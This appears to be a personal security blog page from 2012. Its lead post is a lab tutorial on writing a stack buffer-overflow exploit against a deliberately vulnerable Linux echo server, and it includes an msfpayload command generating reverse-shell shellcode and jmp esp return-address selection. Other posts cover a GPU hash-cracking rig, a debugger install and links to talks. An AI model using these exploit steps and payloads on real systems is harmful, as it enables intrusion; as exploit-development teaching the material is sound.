Friday, December 28, 2012

EXPLOIT-DEV : Simple Buffer Overflow exploit writing on Linux

I am going to do a simple buffer overflow on 32-bit Linux. The target application software is namely vuln-server which you can download here.



Why I use this software? It is because this echo server is acting difference to normal echo server. It will echo back the message in reverse order.

Does it matter? Yes, it does matter when you are developing the exploit. The shellcode should be reversed and the return address should not be reversed. It is quite difference to the normal exploit writing.

I develop this exploit under BackTrack 5r3 (32-bit). Let's compile this echo server with gcc with the following switches in order to disable the stack protection.

gcc vuln-server.c -o vuln-server -static -fno-stack-protector -z norelro -ggdb

Run the vuln-server :

./vuln-server 5700

Open another terminal to run the client :

nc -vv 127.0.0.1 5700
Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit

Enter something on the client, for example :

Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit
hello world
dlrow olleh

You will find out that the message you entered is echo back in reverse order.

The server side will display :

127.0.0.1:41959 hello world

Now, write a python script to send 500 bytes of data to the echo server.



Run it and you will find out that the EIP register is overwritten by A's.

Go to create a 500 unique characters to overwrite the EIP.

./pattern_create.rb 500

Copy the result to the captioned python script and replace the junk with the pattern.

Run the python the modified python script again and you will find out that the EIP is overwritten with 0x416c3341.

Reverse the address and find the offset with the following command :

./pattern_offset.rb 0x41336c41 500
[*] Exact match at offset 339

So, the offset is 339.

Now, to create the shellcode with msfpayload and encoded with alpha_upper encoder in order to avoid the bad characters.

msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -e x86/alpha_upper

However, we need to reverse the shellcode with the following python script.

shellcode = "blah blah ...."
shellcode = shellcode[::-1]
shellcode.encode("hex")
print shellcode

Then, add back the "\x" to the shellcode on every two characters.

Okay, it is high time to find the return address.

msfelfscan -j esp vuln-server
[vuln-server]
0x08064e49 push esp; ret
0x08064ea7 push esp; ret
0x08065f71 push esp; ret
0x08081949 push esp; ret
0x08085df9 push esp; retn 0x8934
0x080a56e9 push esp; ret
0x080c37ab jmp esp
0x080c388f jmp esp
0x080c38b7 jmp esp
0x080c3c3f jmp esp
0x080c3d17 jmp esp
0x080c3da7 jmp esp
0x080c3db3 jmp esp
0x080c3dd3 jmp esp
0x080c532b jmp esp <----- selected this one

I select the last one as the return address.

As I mentioned, this echo server is acting difference to others. The flow of the exploit is not running forward but backward. The final exploit python script is like that :



Now, run the listener at port 4444 and run the echo server then run the exploit python script. Yeah, we got the shell.



Therefore, never run any program with root.

That's all! See you.

Tuesday, December 18, 2012

Great talks about Security products and how they suck

The following talks are presented by Joe McCray. He will show you how to bypassing the very expensive (sometimes) security products which claimed themselves can protect your network/system from being attack.

He also urge all the bosses to put more budget on security guys and security training but not just purchase a (or some) security product(s) only.

Bio :

Joe McCray - Advanced Security Lead Instructor

Joseph McCray is the lead / head instructor for Advanced Security by Academy of Computer Education. Joe oversees the quality of instruction of all of our hacking and forensics courses and makes sure that our entire team of instructors has what they need and is prepared to the fullest for each and every class. Joe has been leading Advanced Security's hacking and forensics training classes since 2004.

Joe McCray is a retired Air Force Veteran and has been in security for over 15 years. Joe has been involved in over 150 very high level pentesting assessments and has some major hacking accomplishments that he can share with his classes. His extensive experience and deep knowledge, mixed with his comedic style has lead Joe to be one of the most highly sought after speaking experts in the industry. Joe makes speaking appearances and gives seminars at major events in the security community such as Black Hat, DefCon, BruCon, Hacker Halted and more. Joe is the recipient of the 2009 EC-Council Instructor Circle of Excellence Award and the 2010 EC-Council Instructor of the Year Award. Joe also runs a successful international security training website called Strategic Security.


Please watch them in an open mind. Here we go :

Hacktivity 2012 - Big Bang Theory : The Evolution of Pentesting High Security Environments





Defcon 18 - You Spent All That Money and You Still Got Owned???





You Spent All That Money and You Still Got Owned????




That's all! See you.

Friday, December 14, 2012

HOWTO : Setup My Back|Track 5r3 Personal Supercomputer

My Hardware

CPU : Intel i7-3930K (6 cores, 12 cores with Hyper-Threading, Socket 2011)
Motherboard : ASUS SaberTooth X79
RAM : Corsair Vengeance DDR3 1600 32GB (4GB x 8)
Display Card : Inno3D nVidia GeForce GTX 590 384bit 3072MB DDR5 x 2
Hard Drive : WD SATA III 3TB
Power Supply : Seasonic X-series 1250W
Cooling : Water cooling system with EK products
Case : Lian Li PC-z70 (modified)

My Operating System

Back|Track 5r3 64-bit system as the host operating system for the captioned hardware.

My Problem

When boot up the Back|Track 5r3 and started "startx", the screen of the monitor will be black out. It is because I have nVidia display card in the system.

The only way to solve it is when booting up to the Back|Track 5r3, press "Tab" in the boot option menu. Then enter the following at the end of "text splash vga=791".

text splash vga=791 nomodeset

After that, the Back|Track 5r3 will boot up after entering the command "startx". Install the system as usual to your hard drive.

After the installation is completed, do not reboot the system. Edit the following file instead after mounted the partitions of the hard drive.

nano /etc/default/grub

Locate 'GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791"' and append the following :

text splash vga=791 nomodeset

and it will be looking like this :

GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791 nomodeset"

Then execute the following commands :

update-grub
fix-splash

Reboot the system.

My nVidia and CUDA drivers

Install the nVidia current driver from the repos of Back|Track :

apt-get update
apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

After the nVidia driver is installed, execute the following command :

nvidia-xconfig

Now, it is high time to install the CUDA driver. Go to the CUDA Developer site and download the driver. Make sure you selected Ubuntu 10.04 version.

64-bit version :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel-update-1/installers/cuda_5.0.35_linux_64_ubuntu10.04-1.run

32-bit version :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel-update-1/installers/cuda_5.0.35_linux_32_ubuntu10.04-1.run

After the download, make it the be executable.

For example :

chmod +x cuda_5.0.35_linux_64_ubuntu10.04-1.run

Then, install it and follow the instruction on screen. Accept the default settings.

cuda_5.0.35_linux_64_ubuntu10.04-1.run

The last step for the installation is to set up the path of the executable files and libraries.

nano /root/.bashrc

Append the following line at the end of the file.

PATH=$PATH:/usr/local/cuda-5.0/bin

nano /etc/ld.so.conf.d/cuda.conf

Add the following lines to the file.

/usr/local/cuda-5.0/lib
/usr/local/cuda-5.0/lib64

Then execute the following command and reboot afterward.

ldconfig

My Hash Cracking Power

We use oclhashcat+ to test the performance of the cracking power of this hardware.

cd /pentest/passwod/oclhastcat+
./cudaExample0.sh
./cudaExample400.sh
./cudaExample500.sh

If you can see the hashes are cracked, the CUDA is setting up properly.

My Addtional Softwares

This host is for hashes and passwords cracking. The penentration testing work will be doing on virtual machines.

I will install virtualbox, sysinfo, shutter, synaptic, gtk-recordmydesktop, and sensors-applet to enhance the function of this host.

By the way, I need to fix the minor bugs of the Back|Track 5r3.

Bug #1 :

There is no sound since Back|Track 5.

mkdir /root/.config/autostart
nano /root/.config/autostart/pulseaudio.desktop

Add the following lines to the file.

[Desktop Entry]
Type=Application
Exec=/usr/bin/pulseaudio
Hidden=false
NoDisplay=false
X-GNOME-Autostart-enabled=true
Name=Pulseaudio
Comment=Start Pulseaudio

Bug #2 :

Wicd cannot connect to D-Bus since Back|Track 5.

dpkg-reconfigure wicd
update-rc.d wicd defaults

That's all! See you.

Tuesday, December 11, 2012

HOWTO : Install edb-debugger on Ubuntu 12.10

When we are doing debugging work on Windows system, we will use Immunity Debugger or Olldbg. Those are very good debuggers for Windows system. When doing debugging work on Linux, there is a command line version, namely GDB (The GNU Project Debugger). How about the GUI version of Linux debugger? Yes, there is one available, it is namely Evan's Debugger (edb-debugger).

The current version is 0.9.18. However, it is not working properly on Ubuntu 12.04 LTS and 12.10. The available deb package version 0.9.17 cannot work properly on the captioned version of Ubuntu too.

The only solution is to install the svn version (current is 0.9.19). I am going to show you how.

Step 1 :

sudo apt-get update
sudo apt-get install libqt4-dev libboost1.48-all-dev subversion

Step 2 :

svn checkout http://edb-debugger.googlecode.com/svn/trunk/ edb-debugger
cd edb-debugger
qmake
make
sudo make install

Step 3 :

To see where is the edb installed to.

whereis edb

The following is showing the 64-bit system :

/bin/edb /lib64/edb

Go back to the user directory, such as /home/samiux.

cd /home/samiux
mkdir .edb

Step 4 :

Run the program :

sudo edb

Once the program is launched, there is a popup saying that the library files cannot be located. You need to go to the "Directories" at the "Preferences".

Symbol Directory - /home/samiux/.edb
Plugin Directory - /lib64/edb/
Session Directory - /home/samiux/.edb

That's all! See you.

Saturday, December 01, 2012

Love Your Neighbour as Yourself

Again, this time I am not going to talk about IT or Infosec.

A video is better than a thousand words ....



That's all! See you.